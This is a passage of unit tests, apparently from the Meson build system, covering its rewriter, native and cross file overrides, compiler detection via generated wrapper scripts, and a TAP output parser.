out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
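# The expected list below encodes the rewriter's sorting: sources in
# subdirectories come first and numbers are compared naturally, so e.g.
# 'a2.c' sorts before 'a10.c'.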
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
            raise unittest.SkipTest('llvm-config not installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
if os.path.exists('/etc/debian_version'):
rc = subprocess.call(['pkg-config', '--cflags', 'python2'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc != 0:
# Python 2 will be removed in Debian Bullseye, thus we must
# remove the build dependency on python2-dev. Keep the tests
# but only run them if dev packages are available.
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', 'python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functioality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
